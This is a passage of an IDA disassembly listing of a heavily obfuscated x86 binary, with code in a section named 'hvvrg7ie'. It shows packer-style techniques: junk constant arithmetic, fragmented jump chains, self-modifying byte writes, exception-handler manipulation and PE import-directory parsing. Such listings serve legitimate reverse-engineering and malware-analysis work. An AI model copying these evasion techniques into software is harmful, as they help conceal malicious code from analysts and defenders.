		jmp	loc_4577F7
; END OF FUNCTION CHUNK	FOR sub_4540B2
; ---------------------------------------------------------------------------
		jle	sub_4430E3
		jmp	loc_44C6B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_4490E8:				; CODE XREF: sub_45A234:loc_43CDFFj
		jnz	loc_449281
		jmp	loc_440A83
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
		js	loc_45218F
		jmp	sub_444F21
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_372. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454463

loc_4490FF:				; CODE XREF: sub_454463+17j
		mov	eax, [ebp-4]

loc_449102:				; CODE XREF: hvvrg7ie:0043D0E3j
		mov	[ebp-8], eax

loc_449105:				; CODE XREF: sub_454463+11j
		call	sub_43A878
		mov	[ebp-0Ah], al
		jmp	loc_44AA70
; END OF FUNCTION CHUNK	FOR sub_454463

; =============== S U B	R O U T	I N E =======================================



sub_449112	proc near		; DATA XREF: sub_43DBDD+5o

; FUNCTION CHUNK AT 004448C9 SIZE 00000005 BYTES

		push	61912A73h
		pop	eax
		xor	eax, 0FC58831Ch
		add	eax, 6E58448Eh
		sub	eax, 0D918F19Ch
		add	eax, 0CD3BB99Dh
		xchg	eax, [esp+0]
		jmp	loc_4448C9
sub_449112	endp

; ---------------------------------------------------------------------------

locret_449138:				; CODE XREF: hvvrg7ie:loc_440D81j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F6DB

loc_449139:				; CODE XREF: sub_43F6DB+11j
		jmp	loc_43B4EB
; END OF FUNCTION CHUNK	FOR sub_43F6DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_44913E:				; CODE XREF: sub_456A52+6ACj
		xor	ecx, ebp
		cmp	edx, ebx
		jmp	loc_43EAC1
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------

loc_449147:				; CODE XREF: hvvrg7ie:00448909j
		jno	loc_446EA7

; =============== S U B	R O U T	I N E =======================================



sub_44914D	proc near		; CODE XREF: hvvrg7ie:loc_457FA9p

; FUNCTION CHUNK AT 0044759B SIZE 00000010 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	eax
		jmp	loc_44759B
sub_44914D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_449157:				; CODE XREF: sub_45541B-1207Bj
		call	sub_44B69F
		test	al, al
		jz	loc_456B5D
		jmp	loc_44C339
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------

loc_449169:				; CODE XREF: hvvrg7ie:0044FD21j
		jge	loc_45AAFD
		ja	loc_4438D6
		sub	ebp, 1D3B1743h
		jmp	loc_452A3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_449180:				; CODE XREF: sub_448100-B43Fj
		add	esi, 7EFD8CD3h
		mov	[esi], eax
		push	offset loc_44AC1E
		jmp	nullsub_262
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------

loc_449192:				; CODE XREF: hvvrg7ie:0043BBD3j
		sub	eax, esi

; =============== S U B	R O U T	I N E =======================================



sub_449194	proc near		; CODE XREF: sub_445CCD-9B15p

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		add	edx, 0DAE9116Eh
		xchg	edx, [esp-4+arg_0]
		jmp	sub_4403D4
sub_449194	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_520. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_4491A7	proc near		; CODE XREF: hvvrg7ie:00448F89j
					; sub_43C290:loc_44BAF2p

; FUNCTION CHUNK AT 00453CEC SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00454D14 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00458AD3 SIZE 0000000A BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		pop	large dword ptr	fs:0
		add	esp, 4
		jmp	loc_453CEC
sub_4491A7	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_434. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_4491BB:				; CODE XREF: sub_44736C+6373j
		jmp	loc_454689
; END OF FUNCTION CHUNK	FOR sub_44736C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_4491C0:				; CODE XREF: sub_45061E-AD5Aj
		jmp	loc_43D320
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_4491C5:				; CODE XREF: sub_445CCD+B0B0j
		mov	edx, ecx
		rol	ebx, 0Fh

loc_4491CA:				; CODE XREF: sub_445CCD:loc_44ED4Bj
		push	edi
		push	0CB3FC59Fh
		pop	edi
		add	edi, 5E9C09A8h
		jmp	loc_43DA62
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_4491DC:				; CODE XREF: hvvrg7ie:00443541j
					; sub_456A52-EAF2j
		and	edx, 0ADD9798Fh
		xor	edx, 0D1C5F1E6h
		or	ebx, edx
		pop	edx
		push	ebx
		pushf
		jmp	loc_45B678
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
		mov	eax, 0F34E90C0h
		push	ebx
		push	93189F33h
		pop	ebx
		rol	ebx, 10h
		add	ebx, 61113F62h
		xchg	ebx, [esp]
		jmp	loc_44B17B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_44920F:				; CODE XREF: sub_4544DD-F61Aj
		pop	edx
		rol	edx, 1Ch
		test	edx, 2000000h
		jmp	loc_44C195
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44921E:				; CODE XREF: sub_43E128+1038Aj
		xchg	ebp, [esi]
		cmp	ecx, edi
		jmp	loc_459E11
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_449227:				; CODE XREF: sub_43E60A+AC5Cj
		or	edx, 541F3445h
		jmp	loc_44517F
; END OF FUNCTION CHUNK	FOR sub_43E60A

; =============== S U B	R O U T	I N E =======================================



sub_449232	proc near		; DATA XREF: sub_45329F+8o

; FUNCTION CHUNK AT 0043EA45 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00442803 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044A4A1 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00451BA6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00453BA0 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 004589C3 SIZE 00000005 BYTES

		push	ecx
		push	edx
		push	0F66ED998h
		pop	edx
		and	edx, 8ABA420Eh
		jnz	loc_44A4A9
		xor	edx, 4540E617h
		jmp	loc_451BA6
sub_449232	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_449251:				; CODE XREF: sub_43E60A:loc_4470A4j
		xor	esi, 2EDD3D02h
		js	loc_44517F
		add	ebp, 0C388AA35h
		shl	edx, 0Bh
		jmp	loc_449227
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
		rol	edi, 18h
		jmp	sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_449273:				; CODE XREF: sub_45A234-1FB99j
		jno	loc_445AEC
		adc	ebx, 0D26BE772h
		xchg	edx, ecx

loc_449281:				; CODE XREF: sub_45A234:loc_4490E8j
		mov	eax, [ebp-0Ch]
		push	eax
		push	eax
		jmp	loc_451850
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------

loc_44928B:				; CODE XREF: hvvrg7ie:loc_44B22Cj
		xchg	ecx, [esp]
		mov	eax, [ebp-10h]
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp]
		jmp	loc_442DC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_44929C:				; CODE XREF: sub_453422+7FCAj
		push	offset sub_44E544
		jmp	loc_44A69E
; END OF FUNCTION CHUNK	FOR sub_453422
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444516

loc_4492A6:				; CODE XREF: sub_444516+7j
		add	esi, 0C110D6Bh
		or	esi, 8A8AFAFFh
		xor	esi, 0DD4981B2h
		call	sub_439529
		push	offset sub_444315
		jmp	loc_44EC43
; END OF FUNCTION CHUNK	FOR sub_444516
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_4492C7:				; CODE XREF: sub_43B3BE+484Aj
		jz	loc_43F586
		jmp	loc_441A33
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444315

loc_4492D2:				; CODE XREF: sub_444315+5FDEj
		jz	loc_4509A6
		push	47C827C4h
		add	eax, 0DB2BE486h
		jmp	loc_44D2A3
; END OF FUNCTION CHUNK	FOR sub_444315
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_4492E8:				; CODE XREF: sub_43E128:loc_45389Dj
		push	edi
		push	0D82BC5B7h
		pop	edi
		and	edi, 4B73B928h
		add	edi, 40F42F95h
		sub	edi, 0F8EFD726h
		jmp	loc_4544F3
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------

loc_449306:				; CODE XREF: hvvrg7ie:004593FEj
		push	0B15AA654h
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44930B:				; CODE XREF: hvvrg7ie:loc_449AB6j
					; sub_43F227:loc_44B6E3j ...
		js	loc_4550B5
		cmp	dword ptr [ebp-4], 7
		jnz	loc_4395B8
		jmp	loc_43BBB2
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_449320:				; CODE XREF: hvvrg7ie:0043C59Dj
		adc	eax, ebx
		pop	eax
		xchg	eax, ebp

loc_449325:				; CODE XREF: hvvrg7ie:0043C590j
		call	sub_44FC12
; START	OF FUNCTION CHUNK FOR sub_4484B9

loc_44932A:				; CODE XREF: sub_4484B9+43DBj
		jmp	loc_4518AE
; END OF FUNCTION CHUNK	FOR sub_4484B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_44932F:				; CODE XREF: sub_43B3BE+43BCj
		jmp	loc_4479F0
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4449AD

loc_449334:				; CODE XREF: sub_4449AD-68E3j
		jmp	nullsub_85
; END OF FUNCTION CHUNK	FOR sub_4449AD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7B1

loc_449339:				; CODE XREF: sub_43B7B1+3j
		jmp	loc_43A4CF
; END OF FUNCTION CHUNK	FOR sub_43B7B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_44933E:				; CODE XREF: sub_44736C+8BA2j
		jnb	loc_44A3A7
		or	ecx, esi
		jmp	loc_443D7D
; END OF FUNCTION CHUNK	FOR sub_44736C

; =============== S U B	R O U T	I N E =======================================



sub_44934B	proc near		; DATA XREF: hvvrg7ie:004402E3o

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043AA01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D029 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043E6D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FFF3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00440E17 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044566A SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044993D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044B8C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F2AD SIZE 0000000C BYTES

		jb	loc_440E17
		push	edx
		push	16EA5D9Bh
sub_44934B	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_442F6B

loc_449357:				; CODE XREF: sub_442F6B:loc_43C2C6j
		pop	edx
		jmp	loc_43C342
; END OF FUNCTION CHUNK	FOR sub_442F6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_44935D:				; CODE XREF: sub_45A234:loc_45A24Bj
		push	eax
		push	24B467ECh
		pop	eax
		or	eax, ds:4000F6h
		test	eax, 40h
		jmp	loc_43A615
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_449375:				; CODE XREF: sub_43F227+11E67j
		jz	loc_446F7D
		mov	esi, 9D20C843h
		or	edi, edx
		jmp	loc_446F7A
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_449387	proc near		; DATA XREF: hvvrg7ie:00441CA5o

; FUNCTION CHUNK AT 0044009C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443745 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044439E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445247 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445A8D SIZE 0000000B BYTES

		or	eax, eax
		jnz	loc_456D2E
		jmp	loc_445247
sub_449387	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442B3C

loc_449394:				; CODE XREF: sub_442B3C-179Cj
		jz	loc_449CE9
		jmp	loc_45111C
; END OF FUNCTION CHUNK	FOR sub_442B3C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_175. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4493A0:				; CODE XREF: hvvrg7ie:00450D22j
		jmp	loc_4478D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_4493A5:				; CODE XREF: sub_4527A1-6245j
		jp	loc_44D7F0
		ror	esi, 2

loc_4493AE:				; CODE XREF: sub_4527A1:loc_445E57j
		push	edx
		push	offset sub_43A142
		jmp	loc_43EF5B
; END OF FUNCTION CHUNK	FOR sub_4527A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_4493B9:				; CODE XREF: sub_4403D4+17B21j
		jnz	loc_45918F
		jmp	loc_439238
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_4493C4:				; CODE XREF: sub_450AA8-E0F8j
		cdq
		jmp	loc_443CFE
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_4493CA:				; CODE XREF: sub_456A52-EADCj
		mov	esi, 0B7B4C6Fh
		xor	ebx, 0ACF38273h
		jmp	loc_44520A
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------

loc_4493DA:				; CODE XREF: hvvrg7ie:004456F6j
		sub	al, 99h
		mov	edx, [ebp-4]
		call	sub_4462F9

loc_4493E4:				; CODE XREF: hvvrg7ie:0044B900j
		jmp	loc_450919
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_4493E9:				; CODE XREF: sub_451E6D:loc_441BE6j
		call	sub_44C072
		jmp	loc_43D649
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------

loc_4493F3:				; CODE XREF: hvvrg7ie:loc_44D8A5j
		push	offset sub_439814
		jmp	locret_44DBE1
; ---------------------------------------------------------------------------

loc_4493FD:				; DATA XREF: sub_44350E+7o
		lea	eax, loc_44D428
		mov	byte ptr [eax],	0C3h
		jmp	loc_4560AE

; =============== S U B	R O U T	I N E =======================================



sub_44940B	proc near		; CODE XREF: sub_40D20A:loc_40D343p
					; sub_44940B+5j
					; DATA XREF: ...
		call	sub_449425
		jmp	ds:off_41D118
sub_44940B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F6F

loc_449416:				; CODE XREF: sub_457F6F+12j
		jmp	loc_459E28
; END OF FUNCTION CHUNK	FOR sub_457F6F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4531B1

loc_44941B:				; CODE XREF: sub_4531B1+10j
		jmp	loc_43EC91
; END OF FUNCTION CHUNK	FOR sub_4531B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A1CA

loc_449420:				; CODE XREF: sub_45A1CA-1DE98j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_45A1CA

; =============== S U B	R O U T	I N E =======================================



sub_449425	proc near		; CODE XREF: sub_444BB4:loc_43CDB5j
					; sub_44940Bp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043BAB0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C7A9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00440E8F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441186 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442272 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00442C06 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00442C30 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00443B34 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004443B3 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00444BC0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445368 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004455AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446662 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004467FE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00447B26 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00448C2A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AFAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD2E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D70E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FBC5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452DBC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004552E7 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004559DB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004562FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004575C6 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045828F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045B136 SIZE 0000000A BYTES

		jno	loc_444BC0
		xchg	ebp, [esp+0]
		mov	edx, ebp
		pop	ebp
		jmp	loc_446662
sub_449425	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_415. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44476B

loc_449437:				; CODE XREF: sub_44476B+12645j
		jmp	nullsub_299
; END OF FUNCTION CHUNK	FOR sub_44476B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_44943C:				; CODE XREF: sub_451669-2CC7j
		pop	edi
		rol	edi, 5
		cmp	edi, 7E07BE7Bh
		jmp	loc_4574C6
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455DA8

loc_44944B:				; CODE XREF: sub_455DA8-1A10Aj
		jnz	loc_44D297
		adc	edi, ecx
		shr	ecx, 0Bh
		mov	ebx, 39C61Eh

loc_44945B:				; CODE XREF: sub_455DA8:loc_43BC96j
		add	ebx, 0BA1A9DEEh
		jmp	loc_444972
; END OF FUNCTION CHUNK	FOR sub_455DA8

; =============== S U B	R O U T	I N E =======================================



sub_449466	proc near		; CODE XREF: sub_446B4C:loc_44360Ep
					; hvvrg7ie:00456DBEj

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D51E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E8F5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00441204 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004422C0 SIZE 00000005 BYTES

		xchg	ebx, [esp-4+arg_0]
		pop	ebx
		push	edx
		push	82314DFEh
		pop	edx
		rol	edx, 9
		jmp	loc_4422C0
sub_449466	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_449479:				; CODE XREF: hvvrg7ie:loc_4517C7j
		push	edx
		push	10B40A62h
		pop	edx
		and	edx, 9A933AFDh
		jnz	loc_43AB6D
		xor	esi, 65381B1Ah
		or	edi, eax
		jmp	loc_43AB6D
; ---------------------------------------------------------------------------
		adc	eax, 5EEB8257h
		jmp	loc_442775
; ---------------------------------------------------------------------------

loc_4494A4:				; CODE XREF: hvvrg7ie:00453AF9j
		jb	loc_43E0A4

loc_4494AA:				; CODE XREF: hvvrg7ie:004572FEj
		jmp	loc_439644
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E26C

loc_4494AF:				; CODE XREF: sub_43E26C+15BCEj
		jmp	loc_44ACC1
; END OF FUNCTION CHUNK	FOR sub_43E26C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B9C9

loc_4494B4:				; CODE XREF: sub_43B9C9+B698j
		jmp	loc_440037
; END OF FUNCTION CHUNK	FOR sub_43B9C9
; ---------------------------------------------------------------------------
		mov	edx, 4812D7DAh
		sbb	edi, edx
		xor	eax, 945E183Fh
		rol	ebp, 0Ch
		jmp	loc_43E0A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_4494CE:				; CODE XREF: sub_43D285:loc_450D10j
		push	offset loc_45715F
		jmp	nullsub_240
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445BE8

loc_4494D8:				; CODE XREF: sub_445BE8:loc_448E83j
		sub	ecx, 14A8099Ch

loc_4494DE:				; CODE XREF: hvvrg7ie:00449054j
		cmp	ecx, 64173B22h
		jmp	loc_455973
; END OF FUNCTION CHUNK	FOR sub_445BE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF30

loc_4494E9:				; CODE XREF: sub_43AF30:loc_451E9Aj
		pop	edi
		lea	eax, nullsub_500
		mov	byte ptr [eax],	0C3h
		jmp	loc_43CD8D
; END OF FUNCTION CHUNK	FOR sub_43AF30
; ---------------------------------------------------------------------------

loc_4494F8:				; CODE XREF: hvvrg7ie:00444241j
		mov	eax, [esp]
		jmp	loc_44571E
; ---------------------------------------------------------------------------

loc_449500:				; DATA XREF: hvvrg7ie:00459C44o
		xchg	esi, [esp]
		sbb	edx, esi
		jmp	loc_441BF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459B2D

loc_44950A:				; CODE XREF: sub_459B2D-949Bj
		jb	locret_449736
		sub	ecx, eax
		jmp	loc_439270
; END OF FUNCTION CHUNK	FOR sub_459B2D

; =============== S U B	R O U T	I N E =======================================



sub_449517	proc near		; DATA XREF: sub_45B5DC+9o
		mov	edx, [ebx+3Ch]
		mov	edx, [ebx+edx+80h]
		or	edx, edx
		jz	loc_43C3D7
		jmp	loc_4564C8
sub_449517	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_44952E:				; CODE XREF: sub_43C811+16846j
		add	edi, 205B2C52h
		add	edi, ebp
		add	edi, 0D62053A4h
		mov	[edi], eax
		pop	edi
		jmp	loc_445B41
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
		sub	edx, 2A2C5438h
		jmp	sub_443452
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_44954F:				; CODE XREF: sub_43C0DE-216Ej
		or	eax, eax
		jnz	loc_45A0F4
		jmp	loc_43D92D
; END OF FUNCTION CHUNK	FOR sub_43C0DE

; =============== S U B	R O U T	I N E =======================================



sub_44955C	proc near		; CODE XREF: sub_407AEA+1Dp
					; sub_407B2A+25p ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043B25C SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0043B9E2 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043EA0A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043F93F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00440619 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440840 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442244 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044B054 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044CBEE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044D29C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044D3BA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E9E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451760 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045327C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00454C01 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00459A23 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B416 SIZE 00000016 BYTES

		push	edi
		mov	edi, eax
		xchg	edi, [esp+0]
		push	10F6C61h
		jmp	loc_43B9E2
sub_44955C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439FEE

loc_44956C:				; CODE XREF: sub_439FEE+422Aj
		test	eax, 400000h
		jmp	loc_43DCA9
; END OF FUNCTION CHUNK	FOR sub_439FEE
; ---------------------------------------------------------------------------

loc_449577:				; CODE XREF: hvvrg7ie:00442C60j
					; hvvrg7ie:loc_44662Bj
		jp	loc_45519C
		pop	eax

; =============== S U B	R O U T	I N E =======================================



sub_44957E	proc near		; CODE XREF: sub_43D964:loc_43C76Ap

; FUNCTION CHUNK AT 0043A19C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043A283 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043C17C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E408 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00444943 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044D866 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450AB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456AEE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045811F SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [edi],	87h
		pop	edi

loc_449586:				; CODE XREF: hvvrg7ie:loc_459E04j
		jmp	loc_43C17C
sub_44957E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44958B	proc near		; DATA XREF: sub_456A52-17F8Ao

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B51A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00447D3D SIZE 00000014 BYTES

		push	144E0312h
		xchg	eax, [esp+4+var_4]
		ror	edi, 11h
		jmp	loc_447D3D
sub_44958B	endp

; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_44959C:				; CODE XREF: hvvrg7ie:0045A558j
		jmp	sub_439AE3
; ---------------------------------------------------------------------------

loc_4495A1:				; CODE XREF: hvvrg7ie:00454FB7j
		jmp	locret_44141E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4548C9

loc_4495A6:				; CODE XREF: sub_4548C9+17j
		jmp	loc_45036F
; END OF FUNCTION CHUNK	FOR sub_4548C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451DFF

loc_4495AB:				; CODE XREF: sub_451DFF-FCA3j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_451DFF
; ---------------------------------------------------------------------------
dword_4495B0	dd 37E32915h		; DATA XREF: sub_448BC0+Ar
					; sub_448BC0:loc_44E8FAr
; ---------------------------------------------------------------------------

loc_4495B4:				; CODE XREF: hvvrg7ie:00441D5Bj
		jmp	loc_440A0F

; =============== S U B	R O U T	I N E =======================================



sub_4495B9	proc near		; CODE XREF: sub_4044D2-1CCp
					; sub_408B90+15p
					; DATA XREF: ...

; FUNCTION CHUNK AT 0043A442 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440F8C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004424D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444BDA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044E12B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450087 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00452F25 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00453027 SIZE 00000010 BYTES

		jb	loc_453027
		push	0A631BBA0h
		pop	eax
